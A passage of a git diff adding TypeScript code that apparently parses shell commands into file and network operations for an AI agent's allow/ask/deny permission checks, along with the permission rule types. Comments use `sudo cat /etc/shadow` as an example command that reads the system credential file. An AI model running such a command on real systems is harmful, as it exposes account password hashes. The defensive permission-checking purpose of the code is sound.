  // Rewrite the caller's array in place with the surviving tokens.
  tokens.splice(0, tokens.length, ...kept);

  return { readFiles, writeFiles };
}

// ─────────────────────────────────────────────────────────────────────────────
// Argument parsing
// ─────────────────────────────────────────────────────────────────────────────

/**
 * Extract positional (non-flag) arguments from a token list.
 *
 * Every token starting with `-` is treated as a flag and skipped. Flags
 * listed in `flagsWithValue` also consume the immediately following token
 * (their value). A flag glued to its value (`-n10`, `--lines=10`) is a single
 * token starting with `-`, so it is skipped as a whole.
 *
 * @param args - Command arguments (without the command name).
 * @param flagsWithValue - Flags whose value is the next token.
 * @returns The positional arguments in their original order.
 */
function getPositionalArgs(
  args: string[],
  flagsWithValue: ReadonlySet<string> = new Set(),
): string[] {
  const positional: string[] = [];

  for (let i = 0; i < args.length; i++) {
    const arg = args[i]!;
    if (!arg.startsWith('-')) {
      positional.push(arg);
      continue;
    }
    // Step over the value that belongs to this flag.
    if (flagsWithValue.has(arg)) i++;
  }

  return positional;
}

// ─────────────────────────────────────────────────────────────────────────────
// Command handler helpers
// ─────────────────────────────────────────────────────────────────────────────

/**
 * Maps the arguments of one command (command name excluded) to the virtual
 * operations it performs; `cwd` is used to resolve relative paths.
 */
type CommandHandler = (args: string[], cwd: string) => ShellOperation[];

/** Build read_file operations from positional path arguments. */
*/ +function readOps( + args: string[], + cwd: string, + flagsWithValue?: ReadonlySet, +): ShellOperation[] { + return getPositionalArgs(args, flagsWithValue) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'read_file' as const, + filePath: resolvePath(p, cwd), + })); +} + +/** Build list_directory operations from positional path arguments. + * Defaults to cwd when no path args are given. */ +function listOps( + args: string[], + cwd: string, + flagsWithValue?: ReadonlySet, +): ShellOperation[] { + const dirs = getPositionalArgs(args, flagsWithValue).filter(looksLikePath); + if (dirs.length === 0) + return [{ virtualTool: 'list_directory', filePath: cwd }]; + return dirs.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); +} + +/** Extract URL domain and return a web_fetch operation, or null on failure. */ +function webOp(url: string): ShellOperation | null { + try { + const normalized = url.includes('://') ? url : `https://${url}`; + const domain = new URL(normalized).hostname; + return domain ? 
{ virtualTool: 'web_fetch', domain } : null; + } catch { + return null; + } +} + +// ───────────────────────────────────────────────────────────────────────────── +// Command dispatch table +// ───────────────────────────────────────────────────────────────────────────── + +const COMMANDS: Readonly> = { + // ── File-read commands ──────────────────────────────────────────────────── + + cat: (a, d) => readOps(a, d), + tac: (a, d) => readOps(a, d), + nl: (a, d) => readOps(a, d), + zcat: (a, d) => readOps(a, d), + bzcat: (a, d) => readOps(a, d), + xzcat: (a, d) => readOps(a, d), + gzcat: (a, d) => readOps(a, d), + lzcat: (a, d) => readOps(a, d), + head: (a, d) => readOps(a, d, new Set(['-n', '-c', '--lines', '--bytes'])), + tail: (a, d) => + readOps( + a, + d, + new Set(['-n', '-c', '-s', '--lines', '--bytes', '--sleep-interval']), + ), + less: (a, d) => + readOps( + a, + d, + new Set(['-b', '-h', '-j', '-p', '-x', '-y', '-z', '--shift', '--tabs']), + ), + more: (a, d) => readOps(a, d), + most: (a, d) => readOps(a, d), + wc: (a, d) => readOps(a, d), + file: (a, d) => + readOps( + a, + d, + new Set([ + '-m', + '-e', + '-F', + '-P', + '--magic-file', + '--exclude', + '--extension', + '--separator', + ]), + ), + stat: (a, d) => + readOps( + a, + d, + new Set(['-c', '-f', '--format', '--printf', '--file-system']), + ), + readlink: (a, d) => + readOps( + a, + d, + new Set([ + '-e', + '-f', + '-m', + '-q', + '-s', + '-v', + '-z', + '--canonicalize', + '--canonicalize-existing', + '--canonicalize-missing', + '--no-newline', + '--quiet', + '--silent', + '--verbose', + '--zero', + ]), + ), + realpath: (a, d) => + readOps( + a, + d, + new Set([ + '--relative-to', + '--relative-base', + '-e', + '-m', + '-s', + '-z', + '--canonicalize-existing', + '--canonicalize-missing', + '--logical', + '--physical', + '--no-symlinks', + '--quiet', + '--strip', + '--zero', + ]), + ), + diff: (a, d) => + readOps( + a, + d, + new Set([ + '-u', + '-U', + '-c', + '-C', + '-I', + '-x', + '-X', + 
'-W', + '--label', + '--to-file', + '--from-file', + '--width', + '--horizon-lines', + '--strip-trailing-cr', + '--ignore-matching-lines', + '--exclude', + '--exclude-from', + ]), + ), + diff3: (a, d) => + readOps( + a, + d, + new Set([ + '-m', + '-T', + '-A', + '-E', + '-e', + '-x', + '-X', + '-3', + '-i', + '--label', + ]), + ), + sdiff: (a, d) => + readOps( + a, + d, + new Set(['-o', '-w', '-W', '-s', '-i', '-b', '-B', '-E', '-H']), + ), + cmp: (a, d) => + readOps( + a, + d, + new Set([ + '-i', + '-l', + '-n', + '-s', + '--ignore-initial', + '--bytes', + '--print-bytes', + '--quiet', + '--silent', + '--verbose', + '--zero', + ]), + ), + md5sum: (a, d) => readOps(a, d), + sha1sum: (a, d) => readOps(a, d), + sha256sum: (a, d) => readOps(a, d), + sha512sum: (a, d) => readOps(a, d), + sha224sum: (a, d) => readOps(a, d), + sha384sum: (a, d) => readOps(a, d), + cksum: (a, d) => readOps(a, d), + b2sum: (a, d) => readOps(a, d), + sum: (a, d) => readOps(a, d), + strings: (a, d) => + readOps( + a, + d, + new Set([ + '-n', + '-t', + '-e', + '-o', + '-a', + '--min-len', + '--radix', + '--encoding', + '--file', + '--print-file-name', + '--data', + '--all', + ]), + ), + hexdump: (a, d) => + readOps( + a, + d, + new Set([ + '-n', + '-s', + '-l', + '-C', + '-b', + '-c', + '-d', + '-o', + '-x', + '-e', + '-f', + '-v', + ]), + ), + xxd: (a, d) => + readOps( + a, + d, + new Set([ + '-l', + '-s', + '-c', + '-g', + '-o', + '-n', + '-b', + '-e', + '-i', + '-p', + '-r', + '-u', + '-E', + ]), + ), + od: (a, d) => + readOps( + a, + d, + new Set([ + '-N', + '-j', + '-w', + '-s', + '-t', + '-A', + '-v', + '--address-radix', + '--endian', + '--format', + '--read-bytes', + '--skip-bytes', + '--strings', + '--output-duplicates', + '--width', + ]), + ), + sort: (a, d) => + readOps( + a, + d, + new Set([ + '-k', + '-t', + '-T', + '--output', + '-o', + '--field-separator', + '--key', + '--temporary-directory', + '--compress-program', + '--batch-size', + '--parallel', + '--random-source', + 
'--sort', + ]), + ), + uniq: (a, d) => + readOps( + a, + d, + new Set([ + '-f', + '-s', + '-w', + '-n', + '--skip-fields', + '--skip-chars', + '--check-chars', + ]), + ), + cut: (a, d) => + readOps( + a, + d, + new Set([ + '-b', + '-c', + '-d', + '-f', + '--delimiter', + '--fields', + '--bytes', + '--characters', + '--output-delimiter', + ]), + ), + paste: (a, d) => + readOps(a, d, new Set(['-d', '-s', '--delimiters', '--serial'])), + join: (a, d) => + readOps( + a, + d, + new Set([ + '-t', + '-1', + '-2', + '-j', + '-o', + '-a', + '-e', + '--field', + '--header', + '--check-order', + '--nocheck-order', + '--zero-terminated', + ]), + ), + column: (a, d) => + readOps( + a, + d, + new Set([ + '-t', + '-s', + '-n', + '-c', + '-o', + '-x', + '--table', + '--separator', + '--output-separator', + '--fillrows', + ]), + ), + fold: (a, d) => + readOps( + a, + d, + new Set(['-w', '-b', '-s', '--width', '--bytes', '--spaces']), + ), + expand: (a, d) => readOps(a, d, new Set(['-t', '--tabs', '--initial'])), + unexpand: (a, d) => + readOps(a, d, new Set(['-t', '-a', '--tabs', '--all', '--first-only'])), + base64: (a, d) => + readOps( + a, + d, + new Set(['-d', '-i', '-w', '--decode', '--ignore-garbage', '--wrap']), + ), + base32: (a, d) => + readOps( + a, + d, + new Set(['-d', '-i', '-w', '--decode', '--ignore-garbage', '--wrap']), + ), + tr: (a, d) => readOps(a, d), + + // ── Grep / search commands ──────────────────────────────────────────────── + + grep: (args, cwd) => { + const hasPatternFlag = args.some( + (a) => + a === '-e' || a === '-f' || a.startsWith('-e') || a.startsWith('-f'), + ); + const isRecursive = args.some((a) => + ['-r', '-R', '--recursive', '--dereference-recursive'].includes(a), + ); + const flagsWithValue = new Set([ + '-e', + '-f', + '-m', + '-A', + '-B', + '-C', + '--context', + '--include', + '--exclude', + '--exclude-dir', + '--max-count', + '--after-context', + '--before-context', + '-n', + '--line-number', + '--label', + '-D', + '--devices', + 
'--max-depth', + '-X', + '--exclude-from', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + // If -e/-f was used, there is no positional pattern; all positionals are paths. + // Otherwise, the first positional is the pattern and the rest are paths. + const filePaths = hasPatternFlag ? positional : positional.slice(1); + const tool: 'read_file' | 'list_directory' = isRecursive + ? 'list_directory' + : 'read_file'; + return filePaths.map((p) => ({ + virtualTool: tool, + filePath: resolvePath(p, cwd), + })); + }, + egrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + fgrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + zgrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + bzgrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + + rg: (args, cwd) => { + // ripgrep: recursive by default; first non-flag positional = pattern + const hasPatternFlag = args.some((a) => a === '-e' || a === '-f'); + const flagsWithValue = new Set([ + '-e', + '-f', + '-m', + '-A', + '-B', + '-C', + '-t', + '-T', + '-g', + '--iglob', + '--glob', + '--type', + '--type-not', + '--max-count', + '--max-depth', + '--context', + '--after-context', + '--before-context', + '-M', + '--max-columns', + '--field-match-separator', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + const filePaths = hasPatternFlag ? positional : positional.slice(1); + return filePaths.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); + }, + + ag: (args, cwd) => { + const hasPatternFlag = args.some((a) => a === '-e'); + const flagsWithValue = new Set([ + '-e', + '-m', + '-A', + '-B', + '-C', + '--depth', + '--file-search-regex', + '--file-search-regex-i', + '--ignore', + '--ignore-dir', + '-n', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + const filePaths = hasPatternFlag ? 
positional : positional.slice(1); + return filePaths.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); + }, + + ack: (args, cwd) => { + const flagsWithValue = new Set([ + '-m', + '-A', + '-B', + '-C', + '--type', + '--ignore-dir', + '--ignore-file', + '--ignore-directory', + '-n', + ]); + // ack: first positional = pattern, rest = paths + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + return positional.slice(1).map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); + }, + + // ── Directory-listing commands ──────────────────────────────────────────── + + ls: (a, d) => listOps(a, d), + dir: (a, d) => listOps(a, d), + vdir: (a, d) => listOps(a, d), + exa: (a, d) => + listOps( + a, + d, + new Set([ + '-L', + '--level', + '--sort', + '--color', + '--colour', + '--group', + '-I', + '--ignore-glob', + ]), + ), + eza: (a, d) => + listOps( + a, + d, + new Set([ + '-L', + '--level', + '--sort', + '--color', + '--colour', + '--group', + '-I', + '--ignore-glob', + ]), + ), + lsd: (a, d) => + listOps( + a, + d, + new Set([ + '--depth', + '--color', + '--icon', + '--icon-theme', + '--date', + '--size', + '--blocks', + '--header', + '--classic', + '--no-symlink', + '--ignore-glob', + '-I', + ]), + ), + + find: (args, cwd) => { + // `find [starting-point...] [expression]` + // Starting points come before any expression keyword beginning with `-` or `(`. 
+ const expressionKeywords = new Set([ + '-name', + '-iname', + '-path', + '-ipath', + '-regex', + '-iregex', + '-type', + '-maxdepth', + '-mindepth', + '-newer', + '-mtime', + '-atime', + '-ctime', + '-size', + '-user', + '-group', + '-perm', + '-links', + '-inum', + '-exec', + '-execdir', + '-ok', + '-okdir', + '-print', + '-print0', + '-ls', + '-delete', + '-prune', + '-depth', + '-empty', + '-readable', + '-writable', + '-executable', + '-follow', + '-xdev', + '-mount', + '-true', + '-false', + '-not', + '!', + '-a', + '-and', + '-o', + '-or', + ]); + const startingPoints: string[] = []; + for (const arg of args) { + if ( + arg.startsWith('-') || + arg === '(' || + arg === ')' || + expressionKeywords.has(arg) + ) + break; + if (looksLikePath(arg)) startingPoints.push(resolvePath(arg, cwd)); + } + if (startingPoints.length === 0) { + return [{ virtualTool: 'list_directory', filePath: cwd }]; + } + return startingPoints.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: p, + })); + }, + + tree: (args, cwd) => + listOps( + args, + cwd, + new Set([ + '-L', + '-P', + '-I', + '-o', + '-n', + '-H', + '-T', + '--charset', + '--filelimit', + '--matchdirs', + '--dirsfirst', + '-J', + '-X', + '--du', + '--si', + ]), + ), + + du: (args, cwd) => + listOps( + args, + cwd, + new Set([ + '-d', + '--max-depth', + '--threshold', + '-t', + '--block-size', + '-B', + '--time-style', + '--exclude', + '-X', + '--time', + '--output', + ]), + ), + + // ── File-write commands (create or overwrite) ───────────────────────────── + + touch: (args, cwd) => + getPositionalArgs( + args, + new Set(['-t', '-r', '--reference', '--date', '-d', '--time']), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, cwd), + })), + + mkdir: (args, cwd) => + getPositionalArgs(args, new Set(['-m', '--mode', '-Z', '--context'])) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, 
cwd), + })), + + mkfifo: (args, cwd) => + getPositionalArgs(args, new Set(['-m', '--mode', '-Z'])) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, cwd), + })), + + tee: (args, cwd) => + getPositionalArgs(args) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, cwd), + })), + + cp: (args, cwd) => { + const flagsWithValue = new Set([ + '-S', + '--suffix', + '-t', + '--target-directory', + '--backup', + '--no-target-directory', + '--sparse', + '--reflink', + '-Z', + '--context', + '--copy-contents', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + if (positional.length === 0) return []; + if (positional.length === 1) { + return [ + { + virtualTool: 'read_file', + filePath: resolvePath(positional[0]!, cwd), + }, + ]; + } + const srcs = positional.slice(0, -1); + const dst = positional[positional.length - 1]!; + return [ + ...srcs.map((p) => ({ + virtualTool: 'read_file' as const, + filePath: resolvePath(p, cwd), + })), + { virtualTool: 'write_file' as const, filePath: resolvePath(dst, cwd) }, + ]; + }, + + mv: (args, cwd) => { + const flagsWithValue = new Set([ + '-S', + '--suffix', + '-t', + '--target-directory', + '--backup', + '-Z', + '--context', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + if (positional.length < 2) return []; + const srcs = positional.slice(0, -1); + const dst = positional[positional.length - 1]!; + return [ + // The source files are edited (moved away — their original location changes) + ...srcs.map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + { virtualTool: 'write_file' as const, filePath: resolvePath(dst, cwd) }, + ]; + }, + + install: (args, cwd) => { + const flagsWithValue = new Set([ + '-m', + '--mode', + '-o', + '--owner', + '-g', + '--group', + '-S', + '--suffix', + '-t', + 
'--target-directory', + '-T', + '--no-target-directory', + '-Z', + '--context', + '-C', + '--compare', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + if (positional.length < 2) return []; + const dst = positional[positional.length - 1]!; + return [{ virtualTool: 'write_file', filePath: resolvePath(dst, cwd) }]; + }, + + dd: (args, cwd) => { + // dd if=input of=output — arguments are key=value pairs, not flags + const ops: ShellOperation[] = []; + for (const arg of args) { + if (arg.startsWith('if=')) { + const p = arg.slice(3); + if (looksLikePath(p)) { + ops.push({ virtualTool: 'read_file', filePath: resolvePath(p, cwd) }); + } + } else if (arg.startsWith('of=')) { + const p = arg.slice(3); + if (looksLikePath(p)) { + ops.push({ + virtualTool: 'write_file', + filePath: resolvePath(p, cwd), + }); + } + } + } + return ops; + }, + + ln: (args, cwd) => { + // ln [-s] TARGET LINKNAME — the link being created is a write operation + const positional = getPositionalArgs( + args, + new Set(['-S', '--suffix', '-t', '--target-directory', '-b', '--backup']), + ).filter(looksLikePath); + if (positional.length < 2) return []; + const linkname = positional[positional.length - 1]!; + return [ + { virtualTool: 'write_file', filePath: resolvePath(linkname, cwd) }, + ]; + }, + + // ── File-edit commands (modify or delete existing content) ──────────────── + + rm: (args, cwd) => + getPositionalArgs(args, new Set(['--interactive'])) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + rmdir: (args, cwd) => + getPositionalArgs( + args, + new Set(['--ignore-fail-on-non-empty', '-p', '--parents']), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + unlink: (args, cwd) => + getPositionalArgs(args) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + 
})), + + shred: (args, cwd) => + getPositionalArgs( + args, + new Set(['-n', '--iterations', '-s', '--size', '--random-source']), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + truncate: (args, cwd) => + getPositionalArgs( + args, + new Set([ + '-s', + '--size', + '-r', + '--reference', + '-o', + '-I', + '-c', + '--io-blocks', + '--no-create', + ]), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + chmod: (args, cwd) => { + // chmod [opts] MODE file... — the mode is the first positional arg. + // Apply slice(1) BEFORE filter so that numeric modes like '755' (which are + // filtered by looksLikePath) don't cause the file path to be dropped. + const positional = getPositionalArgs( + args, + new Set(['-f', '--reference', '--from']), + ); + return positional + .slice(1) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + chown: (args, cwd) => { + // chown [opts] OWNER[:GROUP] file... — the owner spec is the first positional. + const positional = getPositionalArgs( + args, + new Set(['--from', '--reference']), + ); + return positional + .slice(1) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + chgrp: (args, cwd) => { + const positional = getPositionalArgs(args, new Set(['--reference'])); + return positional + .slice(1) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + rename: (args, cwd) => { + // rename FROM TO file... — skip first two positionals (the from/to patterns) + const positional = getPositionalArgs(args).filter(looksLikePath); + return positional.slice(2).map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + sed: (args, cwd) => { + // sed [-i] SCRIPT file... 
or sed -e SCRIPT file... + // With -i: in-place edit (virtualTool = 'edit'); otherwise read (virtualTool = 'read_file') + const hasInPlace = args.some((a) => a === '-i' || a.startsWith('-i')); + const hasExplicitScript = args.some( + (a) => a === '-e' || a === '-f' || a.startsWith('-e'), + ); + const flagsWithValue = new Set([ + '-e', + '-f', + '--expression', + '--file', + // NOTE: -i is intentionally absent — it is an optional-suffix flag + // (e.g. `-i`, `-i.bak`) and does NOT consume the next token as a value. + '-l', + '--line-length', + '--sandbox', + '-s', + '--separate', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + // If -e/-f was used, all positionals are file paths. + // Otherwise, the first positional is the script expression. + const filePaths = hasExplicitScript ? positional : positional.slice(1); + const tool: 'edit' | 'read_file' = hasInPlace ? 'edit' : 'read_file'; + return filePaths.map((p) => ({ + virtualTool: tool, + filePath: resolvePath(p, cwd), + })); + }, + + awk: (args, cwd) => { + // awk [-F sep] [-v var=val] PROGRAM file... + // The PROGRAM is the first positional — it will contain `{...}` which is + // filtered out by looksLikePath, so we don't need special handling. 
+ const flagsWithValue = new Set([ + '-F', + '-f', + '-v', + '-m', + '-W', + '-M', + '--source', + '--include', + '--load', + '-b', + '--characters-as-bytes', + '-c', + '--traditional', + '-d', + '-D', + '--debug', + '-e', + '--exec', + '-h', + '--help', + '-i', + '--lint', + '-o', + '-p', + '-r', + '-s', + '-S', + '-t', + '-V', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'read_file' as const, + filePath: resolvePath(p, cwd), + })); + }, + + // ── WebFetch commands ───────────────────────────────────────────────────── + + curl: (args) => { + const flagsWithValue = new Set([ + '-o', + '-O', + '--output', + '-u', + '--user', + '-A', + '--user-agent', + '-H', + '--header', + '-d', + '--data', + '--data-binary', + '--data-raw', + '--data-urlencode', + '-X', + '--request', + '-F', + '--form', + '-e', + '--referer', + '-T', + '--upload-file', + '--cacert', + '--capath', + '--cert', + '--key', + '--pass', + '-m', + '--max-time', + '--connect-timeout', + '-r', + '--range', + '--limit-rate', + '-b', + '--cookie', + '-c', + '--cookie-jar', + '--proxy', + '-U', + '--proxy-user', + '-K', + '--config', + '--netrc-file', + '--resolve', + '--connect-to', + '-w', + '--write-out', + '-x', + '-Y', + '--speed-limit', + '--speed-time', + '-y', + '--max-filesize', + '--proto', + '--proto-redir', + '-E', + '--cert-type', + '--key-type', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter( + (p) => + p.includes('://') || /^https?:\/\//.test(p) || /^ftp:\/\//.test(p), + ) + .flatMap((url) => { + const op = webOp(url); + return op ? 
[op] : []; + }); + }, + + wget: (args) => { + const flagsWithValue = new Set([ + '-O', + '--output-document', + '-P', + '--directory-prefix', + '-o', + '--output-file', + '-a', + '--append-output', + '-U', + '--user-agent', + '--header', + '-e', + '--execute', + '--tries', + '-t', + '-T', + '--timeout', + '--wait', + '-w', + '--quota', + '-Q', + '--bind-address', + '--limit-rate', + '--user', + '--password', + '--proxy-user', + '--proxy-password', + '-i', + '--input-file', + '--base', + '--config', + '--referer', + '-D', + '--domains', + '--exclude-domains', + '-I', + '--include-directories', + '-X', + '--exclude-directories', + '--regex-type', + '-A', + '-R', + '--accept', + '--reject', + '--no-check-certificate', + '--ca-certificate', + '--ca-directory', + '--certificate', + '--private-key', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter((p) => p.includes('://') || /^https?:\/\//.test(p)) + .flatMap((url) => { + const op = webOp(url); + return op ? [op] : []; + }); + }, + + fetch: (args) => { + // BSD `fetch` utility + const flagsWithValue = new Set([ + '-o', + '-q', + '-v', + '-a', + '-T', + '-S', + '--no-verify-peer', + '--no-verify-hostname', + '--ca-cert', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter((p) => p.includes('://')) + .flatMap((url) => { + const op = webOp(url); + return op ? [op] : []; + }); + }, +}; + +// ───────────────────────────────────────────────────────────────────────────── +// Transparent prefix commands +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Flags that consume the next argument as their value, for specific prefix + * commands. Used by the prefix-stripping logic to correctly skip flag values + * (e.g. `-u root` in `sudo -u root cat /etc/shadow`). 
+ */ +const PREFIX_COMMAND_FLAGS_WITH_VALUE = new Map<string, Set<string>>([ + [ + 'sudo', + new Set([ + '-u', + '--user', + '-g', + '--group', + '-C', + '--close-from', + '-c', + '--login-class', + '-D', + '--chdir', + '-p', + '--prompt', + '-r', + '--role', + '-t', + '--type', + '-T', + '--command-timeout', + '-U', + '--other-user', + ]), + ], + ['timeout', new Set(['-s', '--signal', '-k', '--kill-after'])], +]); + +/** + * Commands that act as transparent wrappers around the actual command. + * When encountered, the prefix is stripped and the analysis recurses on + * the remaining command string. + * + * Examples: + * `sudo cat /etc/shadow` → analyse `cat /etc/shadow` + * `timeout 10 wget http://…` → analyse `wget http://…` + */ +const PREFIX_COMMANDS = new Set([ + 'sudo', + 'doas', // OpenBSD sudo alternative + 'env', + 'time', + 'nice', + 'ionice', + 'nohup', + 'timeout', + 'unbuffer', + 'stdbuf', +]); + +// ───────────────────────────────────────────────────────────────────────────── +// Main entry point +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Extract virtual file/network operations from a single simple shell command. + * + * This function expects a **single simple command** (no `&&`, `||`, `;`, `|` + * operators). Use `splitCompoundCommand()` before calling this for compound + * commands. + * + * Returns an empty array for: + * - Commands not in the known command table (safe default) + * - Empty or whitespace-only input + * - Pure environment variable assignments (`FOO=bar`) + * + * @param simpleCommand - A single shell command without compound operators. + * @param cwd - Working directory for resolving relative paths. + */ +export function extractShellOperations( + simpleCommand: string, + cwd: string, +): ShellOperation[] { + if (!simpleCommand.trim()) return []; + + const tokens = tokenize(simpleCommand); + if (tokens.length === 0) return []; + + // Extract I/O redirections before dispatching to the command handler. 
+ // This mutates `tokens` in-place by removing redirect tokens. + const { readFiles: redirectReads, writeFiles: redirectWrites } = + extractRedirects(tokens, cwd); + + const cmdName = tokens[0]; + if (!cmdName) { + // Only redirections were present (e.g. `> file` or `< file`) + return [ + ...redirectReads.map((p) => ({ + virtualTool: 'read_file' as const, + filePath: p, + })), + ...redirectWrites.map((p) => ({ + virtualTool: 'write_file' as const, + filePath: p, + })), + ]; + } + + // Skip pure environment variable assignments: `FOO=bar`, `FOO=bar BAR=baz` + if (cmdName.includes('=')) return []; + + const ops: ShellOperation[] = []; + + // ── Transparent prefix commands ─────────────────────────────────────────── + if (PREFIX_COMMANDS.has(cmdName)) { + const flagsWithVal = PREFIX_COMMAND_FLAGS_WITH_VALUE.get(cmdName); + // Find where the actual command starts (after flags, flag-values, and env + // variable assignments). For example: + // sudo -u root cat /file → startIdx skips '-u' AND 'root' + let startIdx = 1; + while (startIdx < tokens.length) { + const t = tokens[startIdx]!; + if (t.startsWith('-')) { + // Skip the flag itself + startIdx++; + // If this flag takes a separate value argument, skip that too + if ( + flagsWithVal?.has(t) && + startIdx < tokens.length && + !tokens[startIdx]!.startsWith('-') + ) { + startIdx++; + } + } else if (t.includes('=')) { + // Environment variable assignment: skip + startIdx++; + } else { + break; + } + } + // `timeout DURATION command` — the duration is a numeric positional that + // precedes the actual command. Skip it. + if ( + cmdName === 'timeout' && + startIdx < tokens.length && + /^\d/.test(tokens[startIdx]!) 
+ ) { + startIdx++; + } + if (startIdx < tokens.length) { + // Reconstruct the inner command and recurse + const innerCommand = tokens.slice(startIdx).join(' '); + ops.push(...extractShellOperations(innerCommand, cwd)); + } + } else { + // ── Dispatch to the known-command handler ───────────────────────────── + const handler = COMMANDS[cmdName]; + if (handler) { + const args = tokens.slice(1); + ops.push(...handler(args, cwd)); + } + // Unknown commands: return no ops (safe — we don't guess what we don't know) + } + + // Append redirect-derived operations + ops.push( + ...redirectReads.map((p) => ({ + virtualTool: 'read_file' as const, + filePath: p, + })), + ...redirectWrites.map((p) => ({ + virtualTool: 'write_file' as const, + filePath: p, + })), + ); + + return ops; +} diff --git a/packages/core/src/permissions/types.ts b/packages/core/src/permissions/types.ts new file mode 100644 index 000000000..01d919cba --- /dev/null +++ b/packages/core/src/permissions/types.ts @@ -0,0 +1,109 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * The result of a permission evaluation for a tool or command. + * - 'allow': Auto-approved, no confirmation needed. + * - 'ask': Requires user confirmation before proceeding. + * - 'deny': Blocked; will not run. + * - 'default': No explicit rule matched; falls back to the global approval mode. + */ +export type PermissionDecision = 'allow' | 'ask' | 'deny' | 'default'; + +/** The type of a permission rule. */ +export type RuleType = 'allow' | 'ask' | 'deny'; + +/** The scope/source of a permission rule. */ +export type RuleScope = 'system' | 'user' | 'workspace' | 'session'; + +/** + * The kind of specifier a rule uses, determines which matching algorithm + * to apply. 
+ * + * - 'command': Shell command glob matching (for Bash / run_shell_command) + * - 'path': File path gitignore-style matching (for Read / Edit / Write tools) + * - 'domain': Domain matching with `domain:` prefix (for WebFetch) + * - 'literal': Simple literal equality (fallback for unknown tool types) + */ +export type SpecifierKind = 'command' | 'path' | 'domain' | 'literal'; + +/** + * A parsed permission rule. + * Rules have the form "ToolName" or "ToolName(specifier)". + * + * Examples: + * "Bash" → all shell commands + * "Bash(git *)" → shell commands matching glob + * "Read(./secrets/**)" → file reads matching path pattern + * "Edit(/src/**\/*.ts)" → file edits matching path pattern + * "WebFetch(domain:x.com)" → web fetch matching domain + * "mcp__server__tool" → specific MCP tool + */ +export interface PermissionRule { + /** The original raw rule string as written in config. */ + raw: string; + /** The canonical tool name or category (e.g. "run_shell_command", "Read", "Edit"). */ + toolName: string; + /** + * Optional specifier for fine-grained matching. + * For shell tools: a command pattern (e.g. "git *"). + * For file tools: a path pattern (e.g. "./secrets/**"). + * For WebFetch: a domain pattern (e.g. "domain:example.com"). + */ + specifier?: string; + /** + * The kind of specifier, determines matching algorithm. + * Set automatically during parsing based on the tool name/category. + */ + specifierKind?: SpecifierKind; +} + +/** A complete set of permission rules organized by type. */ +export interface PermissionRuleSet { + allow: PermissionRule[]; + ask: PermissionRule[]; + deny: PermissionRule[]; +} + +/** + * Context for a permission evaluation. 
+ * + * Different fields are relevant depending on the tool type: + * - Shell tools: provide `command` + * - File tools: provide `filePath` + * - WebFetch: provide `domain` + * - Other tools: only `toolName` is needed + */ +export interface PermissionCheckContext { + /** The canonical tool name being checked. */ + toolName: string; + /** + * The shell command being executed (only for Bash / run_shell_command). + */ + command?: string; + /** + * The file path being accessed (only for Read / Edit / Write tools). + * Should be an absolute path for matching against path patterns. + */ + filePath?: string; + /** + * The domain being fetched (only for WebFetch). + */ + domain?: string; + /** + * A generic specifier for literal matching (e.g. skill name for Skill, + * subagent type for Task/Agent). Used when the rule has a literal + * specifier that doesn't fall into command/path/domain categories. + */ + specifier?: string; +} + +/** A rule with its type and source scope, used for listing rules. 
